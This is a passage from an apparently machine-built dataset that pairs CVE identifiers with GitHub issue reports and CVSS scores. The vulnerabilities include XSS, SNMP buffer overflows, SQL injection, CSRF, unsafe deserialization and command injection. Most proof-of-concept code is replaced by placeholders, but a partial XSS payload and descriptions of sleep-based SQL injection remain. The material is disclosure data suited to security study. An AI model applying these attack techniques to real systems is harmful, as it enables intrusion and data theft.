  48171. "Repo_new": "navigatecms/navigate-cms",
  48172. "Issue_Created_At": "2020-06-19T04:43:11Z",
  48173. "description": "Cross Site Script Vulnerability APITAG NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the name= \" Aliases \" feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to function APITAG > Web sites NUMBERTAG Go to \"create > Aliases > add NUMBERTAG add \"// \"> APITAG \" in textbox Alias and Real URL NUMBERTAG Click \"save\". result FILETAG",
  48174. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  48175. "severity": "MEDIUM",
  48176. "baseScore": 4.8,
  48177. "impactScore": 2.7,
  48178. "exploitabilityScore": 1.7
  48179. },
  48180. {
  48181. "CVE_ID": "CVE-2020-14931",
  48182. "Issue_Url_old": "https://github.com/jaygreig86/dmitry/issues/4",
  48183. "Issue_Url_new": "https://github.com/jaygreig86/dmitry/issues/4",
  48184. "Repo_new": "jaygreig86/dmitry",
  48185. "Issue_Created_At": "2020-06-19T16:45:09Z",
  48186. "description": "Remote Stack Overflow (possible RCE). Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connects are unencrypted TCP. This is distinctly different from CVETAG because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code. APITAG For simplicity, I'm going to redirect APITAG WHOIS query by modifying my local APITAG : APITAG Next, I use nc to act as the WHOIS server: CODETAG While that's running, let's see what happens in APITAG ERRORTAG Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.",
  48187. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48188. "severity": "CRITICAL",
  48189. "baseScore": 9.8,
  48190. "impactScore": 5.9,
  48191. "exploitabilityScore": 3.9
  48192. },
  48193. {
  48194. "CVE_ID": "CVE-2020-14934",
  48195. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1352",
  48196. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1352",
  48197. "Repo_new": "contiki-ng/contiki-ng",
  48198. "Issue_Created_At": "2020-08-17T19:31:04Z",
  48199. "description": "Buffer overflow in .bss section due to SNMP request overflow. Description of defect References: FILETAG FILETAG File: FILETAG FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP request with number of OIDs larger than supported by the engine is received and processed. The OIDs listed in a request are processed by APITAG function without verification of the varbinds buffer capacity. The buffer is allocated in .bss as a static variable: URLTAG The varbinds memory buffer is written with the values provided in SNMP request: URLTAG The buffer capacity is determined at compile time by the following definition: URLTAG If the number of variables in the request exceeds the allocated buffer a memory write out of the buffer boundaries occurs. The write operation beyond the buffer capacity provides possibility to overwrite other variables allocated in the .bss section by the application. As the sender of the frame is in controll of the content that will be written beyond the buffer limits and there is no strict process memory separation in contiki ng, this issue may allow overwriting of sensitive memory areas of APITAG device. Type: Out of bounds memory write Result: Memory corruption Memory write to initialized variables segment with arbitrary data Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? An example hex encoded SNMP request causing out of bounds memory write to varbinds: CODETAG",
  48200. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48201. "severity": "CRITICAL",
  48202. "baseScore": 9.8,
  48203. "impactScore": 5.9,
  48204. "exploitabilityScore": 3.9
  48205. },
  48206. {
  48207. "CVE_ID": "CVE-2020-14935",
  48208. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1353",
  48209. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1353",
  48210. "Repo_new": "contiki-ng/contiki-ng",
  48211. "Issue_Created_At": "2020-08-17T19:35:01Z",
  48212. "description": "Stack overflow in SNMP bulk request processing. Description of defect References: FILETAG FILETAG File: FILETAG FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP bulk get request with number of OIDs larger than supported by the engine is received and processed. The OIDs listed in a request are processed by APITAG function without verification of the varbinds buffer capacity. The varbinds memory buffer is written with the values provided in SNMP request: URLTAG The buffer capacity is determined by: URLTAG SNMP get bulk requests are processed by APITAG function that allocates a local stack buffer for buffering OIDs of the requested variables. URLTAG The stack buffer in APITAG is populated with OIDs as a first step before any further processing of the data. URLTAG The varbinds_length variable value is not verified against the capacity of the temporary oid stack buffer. If the number of requested OIDs exceeds the buffer capacity a stack buffer overflow condition occurs and stack memory beyond the allocated oid buffer is overwritten with OIDs received in SNMP get bulk request. As the OIDs are supplied in the request content it may be possible to alter the return address from the APITAG function. If the target architecture uses common addressing space for program and data memory (which is common in APITAG devices) it may also be possible to supply code in the SNMP request payload and redirect the execution path to the injected code by modification of the return address. Type: Out of bounds memory write Stack memory overwrite Return address alteration Remote altering of code execution path Remote executable code injection Remote code execution Result: Memory corruption Remote code execution Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? An example SNMP request causing stack overwrite: CODETAG",
  48213. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48214. "severity": "CRITICAL",
  48215. "baseScore": 9.8,
  48216. "impactScore": 5.9,
  48217. "exploitabilityScore": 3.9
  48218. },
  48219. {
  48220. "CVE_ID": "CVE-2020-14936",
  48221. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1351",
  48222. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1351",
  48223. "Repo_new": "contiki-ng/contiki-ng",
  48224. "Issue_Created_At": "2020-08-17T19:24:47Z",
  48225. "description": "Out of bounds memory read/write in SNMP agent. Description of defect References: FILETAG FILETAG File: FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP request with malformed OID is processed using APITAG APITAG or APITAG when parsing a request or assembling a response. Buffers dedicated to storing OID values used by the SNMP implementation are fixed size with predefined length configurable at compile time: URLTAG All snmp_varbind_t type variables encapsulate an OID buffer of the predefined length: URLTAG With the following occurences of OID buffers allocation in the SNMP code: Static allocation in .bss: URLTAG Stack allocation: URLTAG APITAG In OID decoding function : URLTAG the length of OID data is not verified against the input buffer remaining length. The value in the buffer is trusted to indicate correct number of following OID data bytes: URLTAG The result of decoding is used for computing pointer to the end of buffer, which may result in buf_end variable pointing beyond the input message end: URLTAG as the BER length decoding function does not perform decoded length validation against the input buffer remaining length: URLTAG In addition to the above, the check of provided oid output buffer in snmp_oid_decode_oid: URLTAG may not protect against the overflow when called from SNMP request parsing function: URLTAG due to the fact that oid_len variable remains uninitialized during the call to the function. As a result of the above, memory beyond provided input buffer may be read accessed and memory beyond target buffer capacity may be written if an OID with length larger than SNMP_MSG_OID_MAX_LEN is present in SNMP request message. As the content of write operation is directly provided in the SNMP request, it may be possible to overwrite stack or .bss memory regions with arbitrary content provided in a request with OID length exceeding SNMP_MSG_OID_MAX_LEN limit. APITAG ERRORTAG OID copy and encode functions rely on the fact that the decoded OID has been terminated with a null termination value without verification of the targete buffers capacity. This makes both of the functions vulnerable to similar out ouf bounds writes. Type: Out of bounds memory read Out of bounds memory write Result: Memory corruption Memory write to areas after the target buffer end with arbitrary data Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? Example code demonstrating memory buffer overflow when decoding OID: CODETAG",
  48226. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48227. "severity": "CRITICAL",
  48228. "baseScore": 9.8,
  48229. "impactScore": 5.9,
  48230. "exploitabilityScore": 3.9
  48231. },
  48232. {
  48233. "CVE_ID": "CVE-2020-14937",
  48234. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1354",
  48235. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1354",
  48236. "Repo_new": "contiki-ng/contiki-ng",
  48237. "Issue_Created_At": "2020-08-17T19:36:28Z",
  48238. "description": "Out of bounds memory access in SNMP BER decoder/encoder routines. Description of defect References: FILETAG FILETAG File: FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP ASN NUMBERTAG BER encoder/decoder routines. The length of provided input/output buffers is insufficiently verified when encoding and decoding data. Lack of boundary checks may lead to out of bounds buffer read or write access. Example functions that make access to memory without prior verification of sufficient input data length: URLTAG URLTAG URLTAG URLTAG URLTAG Type: Out of bounds memory access Result: Memory corruption Invalid memory read access Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG",
  48239. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  48240. "severity": "CRITICAL",
  48241. "baseScore": 9.1,
  48242. "impactScore": 5.2,
  48243. "exploitabilityScore": 3.9
  48244. },
  48245. {
  48246. "CVE_ID": "CVE-2020-14942",
  48247. "Issue_Url_old": "https://github.com/tendenci/tendenci/issues/867",
  48248. "Issue_Url_new": "https://github.com/tendenci/tendenci/issues/867",
  48249. "Repo_new": "tendenci/tendenci",
  48250. "Issue_Created_At": "2020-06-19T05:57:47Z",
  48251. "description": "Unrestricted deserialization. APITAG There is no limit to the input of the pickle called, there will be problems CODETAG query field APITAG Find the request to save the field from the form CODETAG Save the field as follows CODETAG This place is to save the serialized value to the template, and then the front end template uses the encoded value request, and the background is deserialized. eg: FILETAG",
  48252. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48253. "severity": "CRITICAL",
  48254. "baseScore": 9.8,
  48255. "impactScore": 5.9,
  48256. "exploitabilityScore": 3.9
  48257. },
  48258. {
  48259. "CVE_ID": "CVE-2020-14960",
  48260. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2327",
  48261. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2327",
  48262. "Repo_new": "php-fusion/PHP-Fusion",
  48263. "Issue_Created_At": "2020-05-18T03:41:20Z",
  48264. "description": "Authenticated Time base SQL Injection in Comments APITAG Describe the bug I've identified an SQL injection vulnerability in the website APITAG that affects the endpoint PATHTAG and can be exploited via the ctype param. I didn't extract any data from the database, I've confirmed the vulnerability using sleep SQL queries with various arithmetic operations. The sleep command combined with the arithmetic operations will cause the server to sleep for various amounts of time depending on the result of the arithmetic operation. For example, setting the value APITAG APITAG / will cause the server to sleep for sum of three time APITAG NUMBERTAG seconds or sleep NUMBERTAG will cause the server to sleep for NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to login as admin NUMBERTAG Go to Content Admin > Comments NUMBERTAG Filter comments POC: APITAG the following HTTP request APITAG sleep NUMBERTAG s):_ CODETAG APITAG Server to sleep for NUMBERTAG seconds_ FILETAG APITAG the following HTTP request APITAG sleep NUMBERTAG s):_ CODETAG APITAG Server to sleep for NUMBERTAG seconds_ FILETAG Impact An attacker can manipulate the SQL statements that are sent to the APITAG database and inject malicious SQL statements. The attacker is able to change the logic of SQL statements executed against the database or extract sensitive information Desktop (please complete the following information): Windows NUMBERTAG Pro Browser: Firefox XAMPP NUMBERTAG",
  48265. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  48266. "severity": "HIGH",
  48267. "baseScore": 7.2,
  48268. "impactScore": 5.9,
  48269. "exploitabilityScore": 1.2
  48270. },
  48271. {
  48272. "CVE_ID": "CVE-2020-14966",
  48273. "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/437",
  48274. "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/437",
  48275. "Repo_new": "kjur/jsrsasign",
  48276. "Issue_Created_At": "2020-06-06T18:11:17Z",
  48277. "description": "Lack of encoding checking in jsrsasign allows a certain degree of malleability in ECDSA signatures. Hello, I've found that jsrsasign NUMBERTAG allows a certain degree of malleability in ECDSA signatures by not checking overflows in the length of sequence and NUMBERTAG s appended or prepended to an integer. Using the secp NUMBERTAG r1 curve it its possible to verify this issue using the following test vectors of Google Wycheproof: ERRORTAG Using the following proof of concept: ERRORTAG The output is: CODETAG However, if you use FILETAG crypto: CODETAG the output is: CODETAG Best regards, Antonio",
  48278. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  48279. "severity": "HIGH",
  48280. "baseScore": 7.5,
  48281. "impactScore": 3.6,
  48282. "exploitabilityScore": 3.9
  48283. },
  48284. {
  48285. "CVE_ID": "CVE-2020-14967",
  48286. "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/439",
  48287. "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/439",
  48288. "Repo_new": "kjur/jsrsasign",
  48289. "Issue_Created_At": "2020-06-06T18:19:15Z",
  48290. "description": "The RSA PKCS NUMBERTAG decryption implementation does not detect ciphertext modification (prepended NUMBERTAG s bytes to the ciphertext). The jsrsasign NUMBERTAG RSA PKCS NUMBERTAG decryption implementation does not detect prepended NUMBERTAG s bytes to the ciphertext and accepts modified ciphertexts without error. You can verify this using the following test vectors from Google Wycheproof: ERRORTAG and proof of concept: ERRORTAG with result: APITAG Best regards, Antonio",
  48291. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48292. "severity": "CRITICAL",
  48293. "baseScore": 9.8,
  48294. "impactScore": 5.9,
  48295. "exploitabilityScore": 3.9
  48296. },
  48297. {
  48298. "CVE_ID": "CVE-2020-14968",
  48299. "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/438",
  48300. "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/438",
  48301. "Repo_new": "kjur/jsrsasign",
  48302. "Issue_Created_At": "2020-06-06T18:15:25Z",
  48303. "description": "The RSA PSS implementation does not detect signature modification (prepending NUMBERTAG bytes) to the signature. The jsrsasign NUMBERTAG RSASSA PSS (RSA PSS) implementation does not detect prepending NUMBERTAG s to the signature and accepts modifies signatures with prepended NUMBERTAG s as valid. You can verify this using the following test vectors from Google Wycheproof: CODETAG in the following proof of concept: ERRORTAG with result: APITAG Best regards, Antonio",
  48304. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48305. "severity": "CRITICAL",
  48306. "baseScore": 9.8,
  48307. "impactScore": 5.9,
  48308. "exploitabilityScore": 3.9
  48309. },
  48310. {
  48311. "CVE_ID": "CVE-2020-14983",
  48312. "Issue_Url_old": "https://github.com/chocolate-doom/chocolate-doom/issues/1293",
  48313. "Issue_Url_new": "https://github.com/chocolate-doom/chocolate-doom/issues/1293",
  48314. "Repo_new": "chocolate-doom/chocolate-doom",
  48315. "Issue_Created_At": "2020-06-22T16:20:12Z",
  48316. "description": "Missing server side num_players validation leading to buffer overflow. Background Version of Chocolate Doom: Chocolate Doom NUMBERTAG from the website) Chocolate Doom git revision APITAG confirmed also in: Crispy Doom NUMBERTAG Operating System and version: Ubuntu NUMBERTAG Compilation: APITAG pwd APITAG Game: ( PATHTAG ) APITAG Bug description When the client starts the game, it sends its settings using the APITAG function. The server receives and parses it in the APITAG function. The settings packet consist of the APITAG integer. This value is used as an maximum value while iterating over corresponding settings and writing them to the APITAG fixed sized NUMBERTAG elements) array. ERRORTAG CODETAG The client can send any byte value and fill the packet with additional bytes to write outside the array and cause stack based buffer overflow. APITAG Modified client's code: CODETAG When all of the clients are connected and the owner starts the game, the server crashes. APITAG Chocolate Doom ASAN: ERRORTAG Chocolate Doom without asan: ERRORTAG Chocolate Doom without stack protection: ERRORTAG Crispy Doom ASAN APITAG ERRORTAG Fix proposition ERRORTAG found by Micha\u0142 Dardas from APITAG",
  48317. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48318. "severity": "CRITICAL",
  48319. "baseScore": 9.8,
  48320. "impactScore": 5.9,
  48321. "exploitabilityScore": 3.9
  48322. },
  48323. {
  48324. "CVE_ID": "CVE-2020-15006",
  48325. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1212",
  48326. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1212",
  48327. "Repo_new": "bludit/bludit",
  48328. "Issue_Created_At": "2020-06-19T07:23:19Z",
  48329. "description": "Store XSS. Describe your problem FILETAG Logo upload only determines the suffix, but not the content, which causes XSS and the user can inject any javascript and html code in the page payload FILETAG FILETAG FILETAG",
  48330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  48331. "severity": "MEDIUM",
  48332. "baseScore": 5.4,
  48333. "impactScore": 2.7,
  48334. "exploitabilityScore": 2.3
  48335. },
  48336. {
  48337. "CVE_ID": "CVE-2020-15014",
  48338. "Issue_Url_old": "https://github.com/pramodmahato/BlogCMS/issues/1",
  48339. "Issue_Url_new": "https://github.com/pramodmahato/blogcms/issues/1",
  48340. "Repo_new": "pramodmahato/blogcms",
  48341. "Issue_Created_At": "2020-06-24T06:42:26Z",
  48342. "description": "There is a csrf vulnerability in FILETAG file. First,let's look at PATHTAG APITAG file does not filter the \"referer\": APITAG APITAG APITAG \"; echo $site; } $result = mysqli_query($db,\"select from users where email like '$email';\"); $row = mysqli_fetch_assoc($result); APITAG if(isset($_POST['submit'])) { $old=md5($_POST['oldpass']); $new=md5($_POST['newpass']); if($old==$originalpass) { $newsql=\"UPDATE users SET Password = '$new' WHERE email='$email'\"; if(mysqli_query($db, $newsql)){ echo APITAG Changed Successfully\"; APITAG }else { echo \" APITAG ERRORTAG updating record: \".$mysqli_error($db).\"') APITAG \"; } } else { echo \" APITAG APITAG Password') APITAG \"; } } ?> Second,I tested this with the Burp tool. I left out the referer and I added the referer and it returns the same thing. Third:I write a poc for this vulnerability:As follows: APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG testing, the vulnerability exists.",
  48343. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  48344. "severity": "HIGH",
  48345. "baseScore": 8.8,
  48346. "impactScore": 5.9,
  48347. "exploitabilityScore": 2.8
  48348. },
  48349. {
  48350. "CVE_ID": "CVE-2020-15018",
  48351. "Issue_Url_old": "https://github.com/antonraharja/playSMS/issues/605",
  48352. "Issue_Url_new": "https://github.com/playsms/playsms/issues/605",
  48353. "Repo_new": "playsms/playsms",
  48354. "Issue_Created_At": "2020-03-20T06:59:49Z",
  48355. "description": "Session Fixation. APITAG is vulnerable to Session fixation ( all versions, including the latest ). Due to the lack of randomization of the APITAG and reuse of APITAG (prior login, after login). An attacker can set the user's session and can take control of the user's account. Steps to reproduce NUMBERTAG Login to APITAG ( Note down the value of cookie [ PHPSESSID NUMBERTAG Logout NUMBERTAG You can confirm the same session by checking prior login and after logging in NUMBERTAG You can observe that the value of PHPSESSID will be the same as in Step NUMBERTAG",
  48356. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  48357. "severity": "MEDIUM",
  48358. "baseScore": 6.5,
  48359. "impactScore": 2.5,
  48360. "exploitabilityScore": 3.9
  48361. },
  48362. {
  48363. "CVE_ID": "CVE-2020-15026",
  48364. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1214",
  48365. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1214",
  48366. "Repo_new": "bludit/bludit",
  48367. "Issue_Created_At": "2020-06-23T03:25:01Z",
  48368. "description": "Arbitrary file download vulnerability. problem hi, The problem is in the backup plugin, the $file parameter is not filtered, resulting in arbitrary file downloads recurrent FILETAG repair URLTAG url Filter $file parameter",
  48369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  48370. "severity": "MEDIUM",
  48371. "baseScore": 4.9,
  48372. "impactScore": 3.6,
  48373. "exploitabilityScore": 1.2
  48374. },
  48375. {
  48376. "CVE_ID": "CVE-2020-15041",
  48377. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2330",
  48378. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2330",
  48379. "Repo_new": "php-fusion/PHP-Fusion",
  48380. "Issue_Created_At": "2020-05-19T07:03:05Z",
  48381. "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in PHP Fusion NUMBERTAG APITAG Version). Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Links\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Site Link NUMBERTAG Insert payload: '> APITAG APITAG APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Click APITAG Link NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  48382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  48383. "severity": "MEDIUM",
  48384. "baseScore": 4.8,
  48385. "impactScore": 2.7,
  48386. "exploitabilityScore": 1.7
  48387. },
  48388. {
  48389. "CVE_ID": "CVE-2020-15071",
  48390. "Issue_Url_old": "https://github.com/symphonycms/symphonycms/issues/2917",
  48391. "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2917",
  48392. "Repo_new": "symphonycms/symphonycms",
  48393. "Issue_Created_At": "2020-06-18T01:57:47Z",
  48394. "description": "XSS vulnerability. FILETAG APITAG .... .... .... ERRORTAG .... .... .... ERRORTAG Here data from $_POST to HTML allows attacker to trigger an XSS with payload llike fields FILETAG",
  48395. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48396. "severity": "MEDIUM",
  48397. "baseScore": 6.1,
  48398. "impactScore": 2.7,
  48399. "exploitabilityScore": 2.8
  48400. },
  48401. {
  48402. "CVE_ID": "CVE-2020-15091",
  48403. "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/4926",
  48404. "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/4926",
  48405. "Repo_new": "tendermint/tendermint",
  48406. "Issue_Created_At": "2020-05-31T06:18:15Z",
  48407. "description": "Consensus: APITAG APITAG is invalid\" Error: \"wrong signature\". Tendermint version : Tendermint Core Semantic Version NUMBERTAG P2P Protocol Version NUMBERTAG Block Protocol Version NUMBERTAG CODETAG ABCI app : Cosmos SDK Version NUMBERTAG CODETAG Big Dipper Explorer URL: APITAG Instructions to setup a similar node (I'd suggest just setting up a sentry): APITAG Access to genesis file for chain: APITAG Sample command to get node info: APITAG Discord channel invite (in case you want to live chat with me... I am Neeraj one of the admins): APITAG Environment : OS (e.g. from /etc/os release): APITAG Install tools : Using COSMOS SDK NUMBERTAG Otherwise, not sure what else to say here. Others : We are running a testnet chain with our CRUD database as one of the application modules, in COSMOS. We currently (as of filing this issue) have NUMBERTAG sentries\" and NUMBERTAG alidators. To be clear, the sentries have no voting power and are the only peers that the validators talk to (the validators can talk to each other too). Furthermore, the validators are IP firewalled to only be able to talk to the sentries and other validators. The sentries themselves keep the validator node id's private. Sentry hostnames: CODETAG I am not listing the validator hostnames, since they are inaccessible (due to the firewall) anyways. The validators are only listening on NUMBERTAG to validators and sentries. The sentries are listening on NUMBERTAG and NUMBERTAG and also each run the cosmos REST server, listening on NUMBERTAG We have opened our testnet to the public. Members of the public have setup sentries and validators of their own, and are expected to use our five sentries as their P2P peers in APITAG What happened : For weeks, things on our testnet had been running fine. I had dozens of members of the public running validators on it, just so these people could learn the process of setting up a validator, etc. I needed to increase the max of allowed validators (to something much higher than the default value of NUMBERTAG in the PATHTAG value in FILETAG . I think that this particular value is a COSMOS thing, but I wanted to mention it for context. We are not using COSMOS governance yet, so we decided to do a hard reset (ie: generate a new FILETAG and start the chain all over). First, here is what I did on my OWN NUMBERTAG sentries and NUMBERTAG alidators: Stopped all my sentries and validators. Wiped out their .blzd folders (this is the name of my \"home\" folder for my \"blzd\" daemons). Because of this, the nodes will all get new node ids and will be new \"peers\". Re initialized each sentry and validator with \"blzd init\", etc... much like I always do when I setup a validator or sentry from scratch (setting up peers, etc). I had also increased the \"max_num_inbound_peers\" to NUMBERTAG and \"max_num_outbound_peers\" to NUMBERTAG in the [p2p] section of APITAG This might only be anecdotal in value. I had an issue where we had too many connects to my sentries and they were dropping connections on the p2p port. Generated the new genesis. Deployed this genesis to all the sentries and validators. Run the necessary COSMOS commands to get the validators staked, created, etc. Start up all my sentries and validators, (thereby starting up the new chain from block NUMBERTAG Next, here is what I asked the people in the community to do with their validator and/or sentries: Run \"blzd unsafe reset all\" on all their daemons. I asked the community do this instead of wiping out the \".blzd\" folder, to save them some work. Copy over the new FILETAG file, replacing the old FILETAG . Set the new peers list in the p2p section of APITAG Run the necessary COSMOS commands to get the validators staked, created, etc. Start up their sentries and validators. The community slowly started up their daemons. At some point (within an hour or so, about NUMBERTAG blocks in), I started to get the error below. I was getting this on all my sentries and validators. Basically, the chain had completely crashed. I tried to restart my validators and sentries, but this was unrecoverable. CODETAG To had no choice but to \"reset\" the whole chain again. I stopped all my validators and sentries and this time, ONLY ran \"unsafe reset all\" on all my daemons. Of course, I also had to do some COSMOS setup again (staking, etc), but started everything again, and asked the community to again do the same steps listed above with yet a new FILETAG , etc. Within an hour, the whole network went down again. Effectively the same error (different block, signature HASH this time): CODETAG What you expected to happen : I expect \"clean\" output, as so: CODETAG APITAG fact that APITAG is non zero is the subject of another investigation) Have you tried the latest version : Not sure. I think so. Although in looking at the Tendermint Github, I see there are two minor versions available that are newer than what we have. How to reproduce it : I more or less explained how it came about above in the \"what happened\" section. Looking at NUMBERTAG I see a similar error message, but not quite the same. But in looking at that issue, it was suggested that perhaps all the nodes did not start from the same \"genesis\" state. It is suggested that perhaps some node(s) have a stale \"home folder\" (.blzd, I presume?). Does \"unsafe reset all\" actually clear out all state including the COSMOS KV stores, app state, etc? I assume this command is sufficient to accomplish a clean slate? Is it possible that in \"resetting\" my chain as I did above, some members of the public possibly forgot to run that \"blzd unsafe reset all\" command, and by missing this step, when they started their node, it had data from the previous chain left over, and this somehow brought the whole network down? If so, it is a bit scary that a single node (or even a bunch of them) could do this. It is an excellent APITAG attack vector, it seems, if so. Logs : Listed above. Config : No specific changes made to Tendermint. node command runtime flags : This is all running from within our daemon that was built with the COSMOS SDK. APITAG output for consensus bugs Not sure how to do this. Anything else we need to know : Most details given above. I did some searching ahead of time to see if I could resolve this myself. I saw some issues related to it but they are already closed.",
  48408. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  48409. "severity": "MEDIUM",
  48410. "baseScore": 6.5,
  48411. "impactScore": 3.6,
  48412. "exploitabilityScore": 2.8
  48413. },
  48414. {
  48415. "CVE_ID": "CVE-2020-15121",
  48416. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/16945",
  48417. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/16945",
  48418. "Repo_new": "radareorg/radare2",
  48419. "Issue_Created_At": "2020-05-24T12:20:29Z",
  48420. "description": "Command injection across r_sys_cmd . Work environment | Questions | Answers | | | PATHTAG (mandatory) | N/A | File format of the file you reverse (mandatory) | PE | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | >= radare2 APITAG Expected behavior idpd does not cause untrusted code execution on my system. Actual behavior Malformed PDB file names in the PDB server path cause shell injection via the following codepath: URLTAG In effect, APITAG is not escaped properly, causing this issue. Note that this is not an isolated case in the code base, grep for APITAG or APITAG for more potential attack vectors. Steps to reproduce the behavior Open the executable in radare2 and run idpd to trigger the download. The shell code will execute, and will create a file called pwned in the current directory. Additional Logs, screenshots, source code, configuration dump, ... I have just used a hex editor to patch the APITAG to APITAG in a PE file from the APITAG repository. FILETAG (password is infected ) The example above is specific to the PDB downloader, but more investigation is required to uncover all the possible attack vectors in the radare2 code base.",
  48421. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  48422. "severity": "CRITICAL",
  48423. "baseScore": 9.6,
  48424. "impactScore": 6.0,
  48425. "exploitabilityScore": 2.8
  48426. },
  48427. {
  48428. "CVE_ID": "CVE-2020-15133",
  48429. "Issue_Url_old": "https://github.com/eventmachine/eventmachine/issues/814",
  48430. "Issue_Url_new": "https://github.com/eventmachine/eventmachine/issues/814",
  48431. "Repo_new": "eventmachine/eventmachine",
  48432. "Issue_Created_At": "2017-12-07T08:30:46Z",
